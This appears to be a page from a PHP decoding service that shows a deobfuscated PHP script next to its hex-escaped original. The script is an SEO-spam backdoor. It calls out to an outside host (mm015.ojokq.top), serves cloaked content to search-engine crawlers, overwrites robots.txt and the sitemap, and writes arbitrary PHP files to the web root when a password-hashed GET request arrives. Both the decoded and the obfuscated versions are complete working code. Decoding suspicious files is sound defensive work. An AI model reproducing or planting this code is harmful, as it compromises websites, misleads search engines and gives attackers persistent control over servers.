Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto U1d8s; A85ph: $ddur_tmp = st_uri(); goto OgS7S; WgLvP: if (!strstr($htag, "\x6e\x6..

Decoded Output download

<?   
 goto U1d8s; A85ph: $ddur_tmp = st_uri(); goto OgS7S; WgLvP: if (!strstr($htag, "nobotuseragent")) { if (strstr($htag, "okhtmlgetcontent")) { @header("Content-type: text/html; charset=utf-8"); $htag = str_replace("okhtmlgetcontent", '', $htag); echo $htag; die; } else { if (strstr($htag, "okxmlgetcontent")) { $htag = str_replace("okxmlgetcontent", '', $htag); @header("Content-type: text/xml"); echo $htag; die; } } } goto lVkHB; ljUkJ: if (isset($_SERVER["HTTP_REFERER"])) { $usse = $_SERVER["HTTP_REFERER"]; $usse = urlencode($usse); } goto snGIv; v1Bjv: $usse = ''; goto ljUkJ; OgS7S: if ($ddur_tmp == '') { $ddur_tmp = "/"; } goto FHU7t; Fanr5: $lag = urlencode($lag); goto v1Bjv; DNon4: function st_uri() { if (isset($_SERVER["REQUEST_URI"])) { $ddur = $_SERVER["REQUEST_URI"]; } else { if (isset($_SERVER["argv"])) { $ddur = $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } else { $ddur = $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } } return $ddur; } goto UWVlc; ca5SL: function daag($url) { $ficonts = ''; if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ficonts = curl_exec($ch); curl_close($ch); } if (!$ficonts) { $ficonts = @file_get_contents($url); } return $ficonts; } goto ufgYV; hn6ir: $web = $htwe . "://" . $towe . "/inde.php?web=" . $host . "&zz=" . sbot() . "&uri=" . $ddur . "&urlshang=" . $usse . "&http=" . $http . "&lang=" . $lag; goto p1Nr1; p1Nr1: $htag = trim(daag($web)); goto WgLvP; U_iqS: function ishtt() { if (isset($_SERVER["HTTPS"]) && strtolower($_SERVER["HTTPS"]) !== "off") { return true; } elseif (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } elseif (isset($_SERVER["HTTP_FRONT_END_HTTPS"]) && strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]) !== "off") { return true; } return false; } goto ljJyu; yfJBP: @ignore_user_abort(1); goto NmEYC; snGIv: if (@$_GET["pd"] != '') { $acot = @$_GET["mapname"]; if (isset($_SERVER["DOCUMENT_ROOT"])) { $path = $_SERVER["DOCUMENT_ROOT"]; } else { $path = dirname(__FILE__); } if (strstr($acot, "sitemap")) { $map_path = $path . "/sitemap.xml"; $file_path = $path . "/robots.txt"; @unlink($map_path); $robots = @file_get_contents($file_path); $data = "User-agent: *" . "\xd
" . "Allow: /"; $sturs = "
\xa" . "Sitemap: " . $http . "://" . $host . "/" . $acot . ".xml"; $futrobot = ''; if (strstr($robots, "/map.xml")) { if (strstr($robots, "/" . $acot . ".xml")) { echo "sitemap in added!"; die; } else { $robots .= $sturs; } } else { @unlink($file_path); $sturs .= "
" . "Sitemap: " . $http . "://" . $host . "/map.xml"; $robots = $data . $sturs; } if (file_put_contents($file_path, trim($robots))) { echo "<br>ok<br>"; } else { echo "<br>false!<br>"; } } else { if (strstr($acot, ".p" . "hp")) { if (sha1(sha1(@$_GET["a"])) == daag($htwe . "://" . $towe . "/a.p" . "hp")) { $dstr = @$_GET["dstr"]; if (file_put_contents($path . "/" . $acot, $dstr)) { echo "ok"; } } } else { echo "<br> false!<br>"; } } die; } goto hn6ir; ljJyu: $host = $_SERVER["HTTP_HOST"]; goto d1GRy; U1d8s: @set_time_limit(5000); goto yfJBP; d1GRy: $lag = @$_SERVER["HTTP_ACCEPT_LANGUAGE"]; goto Fanr5; lVkHB: function sbot() { $uaget = strtolower($_SERVER["HTTP_USER_AGENT"]); if (stristr($uaget, "googlebot") || stristr($uaget, "bing") || stristr($uaget, "yahoo") || stristr($uaget, "google") || stristr($uaget, "Googlebot") || stristr($uaget, "googlebot")) { return true; } else { return false; } } goto ca5SL; UWVlc: $towe = $goto . ".ojokq" . ".top"; goto U_iqS; FHU7t: $ddur = urlencode($ddur_tmp); goto DNon4; wUzQD: $htwe = "http"; goto JZgSQ; JZgSQ: if (ishtt()) { $http = "https"; } else { $http = "http"; } goto A85ph; NmEYC: $goto = "mm015"; goto wUzQD; ufgYV:  ?>

Did this file decode correctly?

Original Code


 goto U1d8s; A85ph: $ddur_tmp = st_uri(); goto OgS7S; WgLvP: if (!strstr($htag, "\x6e\x6f\x62\157\164\165\163\145\162\141\x67\145\156\x74")) { if (strstr($htag, "\x6f\x6b\x68\x74\x6d\x6c\x67\x65\x74\x63\x6f\x6e\x74\x65\x6e\164")) { @header("\103\x6f\x6e\164\x65\156\164\55\164\171\160\x65\x3a\x20\164\x65\x78\164\x2f\150\x74\155\x6c\73\40\143\x68\141\x72\x73\x65\x74\75\x75\164\x66\x2d\x38"); $htag = str_replace("\157\x6b\150\164\x6d\154\147\x65\164\143\x6f\x6e\164\145\156\x74", '', $htag); echo $htag; die; } else { if (strstr($htag, "\157\x6b\170\x6d\x6c\147\x65\164\143\157\156\x74\145\156\x74")) { $htag = str_replace("\157\153\170\155\x6c\x67\x65\164\143\157\x6e\164\x65\x6e\x74", '', $htag); @header("\103\x6f\x6e\164\145\156\164\55\x74\171\160\x65\x3a\x20\164\145\170\164\x2f\x78\x6d\154"); echo $htag; die; } } } goto lVkHB; ljUkJ: if (isset($_SERVER["\x48\x54\x54\x50\137\x52\x45\106\105\122\x45\122"])) { $usse = $_SERVER["\x48\124\x54\x50\137\x52\x45\x46\x45\122\x45\122"]; $usse = urlencode($usse); } goto snGIv; v1Bjv: $usse = ''; goto ljUkJ; OgS7S: if ($ddur_tmp == '') { $ddur_tmp = "\x2f"; } goto FHU7t; Fanr5: $lag = urlencode($lag); goto v1Bjv; DNon4: function st_uri() { if (isset($_SERVER["\122\x45\121\125\x45\123\x54\137\x55\x52\111"])) { $ddur = $_SERVER["\x52\x45\121\x55\105\123\124\137\x55\x52\111"]; } else { if (isset($_SERVER["\x61\162\x67\166"])) { $ddur = $_SERVER["\x50\x48\120\x5f\123\x45\114\x46"] . "\x3f" . $_SERVER["\x61\x72\147\166"][0]; } else { $ddur = $_SERVER["\x50\x48\x50\x5f\123\105\114\x46"] . "\x3f" . $_SERVER["\x51\125\x45\x52\x59\x5f\x53\124\122\x49\116\107"]; } } return $ddur; } goto UWVlc; ca5SL: function daag($url) { $ficonts = ''; if (function_exists("\x63\x75\x72\x6c\x5f\151\x6e\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); $ficonts = curl_exec($ch); curl_close($ch); } if (!$ficonts) { $ficonts = @file_get_contents($url); } return $ficonts; } goto ufgYV; hn6ir: $web = $htwe . "\x3a\57\x2f" . $towe . "\x2f\151\x6e\x64\145\56\160\150\160\x3f\x77\145\x62\75" . $host . "\x26\172\172\x3d" . sbot() . "\x26\165\162\x69\75" . $ddur . "\x26\x75\x72\x6c\x73\150\x61\x6e\147\75" . $usse . "\46\150\x74\164\x70\x3d" . $http . "\x26\154\x61\156\147\75" . $lag; goto p1Nr1; p1Nr1: $htag = trim(daag($web)); goto WgLvP; U_iqS: function ishtt() { if (isset($_SERVER["\110\124\x54\120\123"]) && strtolower($_SERVER["\x48\x54\124\x50\x53"]) !== "\157\x66\146") { return true; } elseif (isset($_SERVER["\110\124\124\120\137\x58\137\106\x4f\122\127\101\122\x44\105\x44\x5f\120\x52\x4f\x54\x4f"]) && $_SERVER["\x48\124\124\120\x5f\x58\137\x46\x4f\122\x57\x41\x52\x44\105\104\137\120\x52\x4f\124\x4f"] === "\150\x74\x74\160\163") { return true; } elseif (isset($_SERVER["\x48\124\x54\120\x5f\106\x52\117\x4e\x54\x5f\x45\x4e\104\137\x48\124\124\120\123"]) && strtolower($_SERVER["\x48\124\x54\x50\137\x46\122\x4f\x4e\x54\x5f\105\x4e\x44\x5f\110\x54\x54\x50\x53"]) !== "\x6f\x66\146") { return true; } return false; } goto ljJyu; yfJBP: @ignore_user_abort(1); goto NmEYC; snGIv: if (@$_GET["\160\144"] != '') { $acot = @$_GET["\x6d\x61\x70\x6e\141\155\x65"]; if (isset($_SERVER["\104\x4f\x43\x55\x4d\x45\x4e\x54\x5f\122\117\x4f\124"])) { $path = $_SERVER["\104\117\x43\125\x4d\x45\x4e\x54\137\122\x4f\117\124"]; } else { $path = dirname(__FILE__); } if (strstr($acot, "\x73\x69\x74\x65\155\x61\x70")) { $map_path = $path . "\57\163\151\x74\145\155\x61\x70\x2e\x78\x6d\x6c"; $file_path = $path . "\57\162\157\142\157\x74\x73\x2e\164\x78\x74"; @unlink($map_path); $robots = @file_get_contents($file_path); $data = "\x55\x73\x65\162\x2d\x61\147\x65\x6e\164\x3a\40\x2a" . "\xd\12" . "\101\154\154\157\167\x3a\x20\57"; $sturs = "\15\xa" . "\123\x69\164\145\155\x61\160\x3a\40" . $http . "\x3a\x2f\57" . $host . "\x2f" . $acot . "\x2e\x78\x6d\x6c"; $futrobot = ''; if (strstr($robots, "\57\x6d\141\x70\x2e\170\155\154")) { if (strstr($robots, "\57" . $acot . "\56\x78\155\154")) { echo "\163\x69\x74\145\x6d\141\160\40\x69\156\x20\x61\144\144\x65\144\41"; die; } else { $robots .= $sturs; } } else { @unlink($file_path); $sturs .= "\15\12" . "\x53\151\164\145\155\141\160\72\x20" . $http . "\x3a\57\x2f" . $host . "\x2f\x6d\x61\x70\x2e\170\155\154"; $robots = $data . $sturs; } if (file_put_contents($file_path, trim($robots))) { echo "\74\x62\162\x3e\x6f\x6b\74\142\x72\76"; } else { echo "\74\142\x72\76\x66\x61\154\x73\145\41\x3c\142\x72\76"; } } else { if (strstr($acot, "\x2e\160" . "\x68\x70")) { if (sha1(sha1(@$_GET["\141"])) == daag($htwe . "\72\57\x2f" . $towe . "\57\x61\x2e\160" . "\150\x70")) { $dstr = @$_GET["\x64\163\x74\x72"]; if (file_put_contents($path . "\57" . $acot, $dstr)) { echo "\x6f\x6b"; } } } else { echo "\74\x62\162\x3e\40\146\x61\154\x73\145\41\74\142\162\x3e"; } } die; } goto hn6ir; ljJyu: $host = $_SERVER["\110\124\124\x50\137\110\x4f\x53\x54"]; goto d1GRy; U1d8s: @set_time_limit(5000); goto yfJBP; d1GRy: $lag = @$_SERVER["\110\124\x54\x50\x5f\x41\x43\103\105\x50\124\x5f\x4c\101\x4e\x47\125\x41\x47\105"]; goto Fanr5; lVkHB: function sbot() { $uaget = strtolower($_SERVER["\x48\124\124\x50\137\125\x53\x45\122\x5f\x41\x47\105\x4e\x54"]); if (stristr($uaget, "\x67\x6f\157\x67\x6c\x65\142\x6f\x74") || stristr($uaget, "\x62\x69\x6e\147") || stristr($uaget, "\x79\x61\x68\157\x6f") || stristr($uaget, "\147\x6f\157\147\154\x65") || stristr($uaget, "\107\x6f\x6f\147\x6c\145\142\x6f\x74") || stristr($uaget, "\x67\157\157\x67\154\145\x62\x6f\x74")) { return true; } else { return false; } } goto ca5SL; UWVlc: $towe = $goto . "\56\x6f\x6a\x6f\153\x71" . "\x2e\164\x6f\160"; goto U_iqS; FHU7t: $ddur = urlencode($ddur_tmp); goto DNon4; wUzQD: $htwe = "\x68\164\164\160"; goto JZgSQ; JZgSQ: if (ishtt()) { $http = "\x68\164\x74\160\163"; } else { $http = "\x68\x74\x74\x70"; } goto A85ph; NmEYC: $goto = "\x6d\155\60\61\x35"; goto wUzQD; ufgYV: 

Function Calls

None

Variables

None

Stats

MD5 0c17c86116812091313617b894b27209
Eval Count 0
Decode Time 57 ms